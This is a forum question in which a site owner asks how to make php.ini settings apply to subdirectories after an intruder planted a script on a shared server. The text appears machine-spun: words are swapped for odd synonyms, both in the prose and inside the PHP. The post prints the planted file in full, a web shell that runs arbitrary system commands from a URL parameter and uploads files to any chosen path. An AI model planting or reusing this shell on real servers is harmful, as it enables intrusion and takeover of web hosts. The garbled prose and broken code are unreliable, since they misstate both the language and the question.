how i assent php.ini record impact directories/sub-directories server?

a few weeks ago i uninterrupted adult hole common server associate uploaded following php script:

<?php
if(isset($_request['cmd'])) {
    relate "<pre>";
    $cmd = ($_request['cmd']);
    system($cmd);
    relate "</pre>";
    die;
}
?>

<?php
if(isset($_request['upload'])) {
    relate '<form enctype="multipart/form-data" action=".config.php?send" method="post">
        <input type="hidden" name="max_file_size" value="5120000" />
        send file: <input name="userfile" type="file" />
        here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
        <input type="submit" value="send file" />
    </form>';
}
?>

<?php
if(isset($_request['send'])) {
    $uploaddir = $_post["direct"];
    $uploadfile = $uploaddir . basename($_files['userfile']['name']);

    (move_uploaded_file($_files['userfile']['tmp_name'], $uploadfile)) {
        relate "file valid, successfully uploaded.\n"; relate $uploaddir;
    } else {
        relate "upload failed";
    }
}
?>

this book allows slight commands by in-url variables.

i have noxious system, among functions, php.ini record public_html directory. hinder book controlling it's located within public_html directory, nonetheless doesn't stop it's sub-directory that. i duplicate php.ini record sub-directory stop controlling directory.

my doubt is, how i assent php.ini record impact directories/sub-directories server?